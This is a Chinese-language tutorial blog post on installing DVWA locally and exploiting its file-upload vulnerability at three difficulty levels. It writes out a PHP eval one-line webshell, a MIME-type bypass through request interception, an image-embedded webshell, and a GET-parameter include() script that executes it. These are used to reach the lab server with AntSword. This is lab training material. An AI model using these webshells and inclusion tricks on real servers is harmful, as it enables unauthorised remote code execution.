文章目录

  • DVWA的安装环境
  • 下载DVWA
  • DVWA——File Upload
  • Low级别测试
  • medium级别测试
  • High级别测试
    • 制作一句话图片木马

DVWA的安装环境

phpstudy 集成了PHP、MySQL、php-mysql等应用或组件。用起来十分方便。(这里就不详细介绍phpstudy的安装教程了)

下载DVWA

DVWA下载地址

将其安装包放在phpstudy的www目录下,找到config.inc.php.dist


并粘贴里边的内容,创建一个新的php文件config.inc.php
我是已经创建好的。
用记事本打开config.inc.php 文件修改以下内容:$_DVWA[ ‘db_password’ ] = ‘p@ssw0rd’; 将引号里面的p@ssw0rd改成 root


保存后打开电脑浏览器 地址栏输入127.0.0.1/DVWA-master/ 按下回车,然后点击网页底下的 Create/Reset Database 按钮会跳转到登录页面
默认账号:admin
密码:password
输入后按回车进入
总体安装起来是非常简单的

DVWA——File Upload

File Upload,即文件上传漏洞, 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。

自我感受
当我在bilibili上面看大师傅们的演示真的令我十分震撼,哈哈哈哈也可能是因为我太菜了吧!
获取服务器的WebShell权限来查看/上传/下载对方文件,查看数据库信息,执行命令,甚至恶搞等等,可以说是能够执行任意操作,实在是厉害,自愧不如。

风险点

·注册/修改个人信息处(上传头像)
·敏感身份认证处(身份证照片/银行卡照片/个人照片……)【多为·金融/借贷应用】
·订单评价反馈处(上传商品照片)【淘宝/京东……】
·朋友圈/空间
·所有能上传操作的地方

文件上传漏洞的利用是有限制条件:
一、能够成功上传木马文件
二、上传文件必须能够被执行
三、上传文件的路径必须可知

Low级别测试

源码:
DVWA_WEB_PAGE_TO_ROOT
为网页的根目录
target_path
变量为上传文件的绝对路径
basename( $_FILES['uploaded']['name'])
将文件中已经uploaded的文件的名字取出并加入到target_path变量中。
if语句判断文件是否上传到指定的路径中,若没有则显示没有上传。
服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。
此级别没有对上传文件的类型进行任何的过滤,也就是可以随意上传php文件。
构造一句话木马

<?php @eval($_POST['A']);?>


这个便是我们上传文件的部分路径
打开蚁剑,添加数据:

连接成功,打开便可以看到以下界面。

medium级别测试

源码:
可以对比出来中级的多了限制条件,只能传JPEG或者png图片并且还有大小限制。

那么我们就通过抓包,将type类型改为image/jpeg。
上传文件抓包:

然后点击forward,回到靶场,发现上传成功:

打开蚁剑,添加数据,连接,成功

High级别测试

源码:

<?phpif( isset( $_POST[ 'Upload' ] ) ) {// Where are we going to be writing to?$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );// File information$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];$uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];// Is it an image?if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&( $uploaded_size < 100000 ) &&getimagesize( $uploaded_tmp ) ) {// Can we move the file to the upload folder?if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {// Noecho '<pre>Your image was not uploaded.</pre>';}else {// Yes!echo "<pre>{$target_path} succesfully uploaded!</pre>";}}else {// Invalid fileecho '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';}
}?>

函数解析

strrpos(string,find,start)
strrpos()函数查找.出现在 $ uploaded_name的位置然后加1,再利用substr()函数从变量$uploaded_name的指定位置截取部分字符串。所以这段代码的作用就是为了截取上传文件的后缀名.

strtolower()
将无论是大写或小写的后缀名全改为小写,以防大小写绕过

getimagesize(string filename)
函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头,函数会报错。
可以看到,High级别的代码读取文件名中最后一个“.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是”.jpg”、”.jpeg” 、”*.png”之一。同时,getimagesize函数更是限制了上传文件的文件头必须为图像类型。

制作一句话图片木马


上传图片:

绕过成功,但我通过蚁剑却连接不上,经过查找资料最后发现需要进行php代码解析,就是将自己的上传的文件(无论是什么类型的文件)以php代码执行;
下面我来补充一下使用蚁剑进行high等级shell连接:

还是需要制作一句话图片木马,上文已经讲过了,这里我就不再多说

3.jpg就是我所使用1.jpg和2.php制作的一句话木马;
然后需要编写一个include()php代码关于include的用法

<?php
$a=$_GET['id'];
include($a)
?>

命名为a.php,接下来就通过文件包含(a.php来包含我们所制作的的一句话木马图片,也就是3.jpg)来使用蚁剑连接:

http://127.0.0.1/DVWA-master/hackable/uploads/a.php?id=3.jpg


连接成功!!!!!!

DVWA的搭建以及文件上传漏洞各个等级测试相关推荐

  1. 【Web安全】中国蚁剑+DVWA(本地文件上传漏洞Upload)

    文章目录 1 中国蚁剑 2 文件上传漏洞(Upload) 2.1 准备hack.php 2.2 从DVWA上传hack.php 3 使用蚁剑来连接获得webshell 1 中国蚁剑 中国蚁剑是一款开源 ...

  2. 文件上传漏洞——DVWA练习

    前言:文件上传漏洞是很常见的漏洞,也非常有趣,接下来就在DVWA靶场中边学边练. 文件上传漏洞: 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向 ...

  3. [网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解(SQL注入、XSS攻击、文件上传漏洞)

    当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...

  4. DVWA靶机-文件上传漏洞(File Upload)

    DVWA靶机-文件上传漏洞(File Upload) 文件上传漏洞的四个等级,low,medium,high,impossible,今天我们针对于不同的等级进行基于文件上传漏洞的攻击 DVWA靶机-暴 ...

  5. dvwa小马上传大马php,集训第六天:文件上传漏洞

    韩舒学姐(相当温柔)今天给我们讲解了文件上传漏洞,以及Anrwsord和Cknife等工具的使用. 上传的文件不进行限制,有可能会被利用于上传可执行文件.脚本到服务器上,并且通过脚本文件可以获得执行服 ...

  6. dvwa中的文件上传漏洞

    环境: Metasploitable2: 192.168.11.157 dvwa版本:Version 1.0.7 (Release date: 08/09/10) kail机器:192.168.11. ...

  7. DVWA之PHP文件上传漏洞(File Upload)

    文件上传漏洞是指由于服务器对于用户上传部分的控制不严格导致攻击者可以上传一个恶意的可执行的文件到服务器.简单点说,就是用户直接或者通过各种绕过方式将webshell上传到服务器中进而执行利用. 首先保 ...

  8. dvwa上传php文件,DVWA之文件上传漏洞

    File Upload,即文件上传漏洞,通常是由于对上传文件的类型.内容没有进行严格的过滤.检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的, ...

  9. 文件上传漏洞测试upload-labs

    文件上传是web十大安全漏洞之一,它是我们在信息安全渗透测试中最常见的漏洞类型 他主要是一些网站上传用的的头像文件的时候没有进行过滤,利用PHP本身的远程木马执行,利用中国菜刀,蚁剑之类的工具进行连接 ...

最新文章

  1. ICLR2020 | 谷歌最新研究:用“复合散度”量化模型合成泛化能力
  2. 小博老师解析Java核心技术 ——JDBC数据库操作类封装
  3. Cpp 对象模型探索 / 父类和子类调用构造函数和析构函数的顺序
  4. 【插件】史上最强编辑器通用ctags插件OpenCTags使用指南v1.2--开发者必备
  5. 移动端测试用例设计总结-笔记
  6. 对AIOps智能化运维的基础理解
  7. Eclipse的两个hibernate plugin
  8. sas python接口_全方位比较3种数据科学工具:Python、R和SAS(附链接)
  9. Team Project 设想 -- 基于用户信息的学术搜索
  10. 关于Spring Bean的生命周期
  11. linux搭建雷霆传奇h5源码,【雷霆传奇H5服务端】2020.07最新超好看大羽翼传奇网页游戏程序[附超详尽构建实例教程]...
  12. 最基本财务基础知识,财务知识基础来源
  13. 利率上浮100bp是什么意思,利率浮动值60BP什么意思
  14. mysql错误码2002_MySQL错误ERROR 2002 (HY000): Can't connect to local MySQL server through socket
  15. python seo 相关的库_11个并不被常用但对开发非常有帮助的Python库
  16. 为你的网站添加 htpps
  17. html中tr中加判断换行符,深入解析HTML的table表格标签与相关的换行问题
  18. 12个VSCode插件工具
  19. 服务器启动文件夹,win10系统开机启动文件夹的路径是什么_网站服务器运行维护...
  20. 点亮星星评分效果(js/vue)

热门文章

  1. 在WPS表格里制作连接到openGauss的实时刷新报表
  2. 软件工程之功能性需求和非功能性需求
  3. 英语中表示同意或肯定的词
  4. 新兴媒体舆情传播动态实时监测的技术解决方案
  5. CPU 发热的几个可能原因
  6. IMX6UL系列小屏驱动之像素时钟无法修改
  7. 数字图像处理 击中击不中变换
  8. c语言 英文课本词汇表的生成,【C/C++】词汇表生成
  9. Hadoop2.6.5安装部署及环境变量配置
  10. 微信卡券新功能开放公告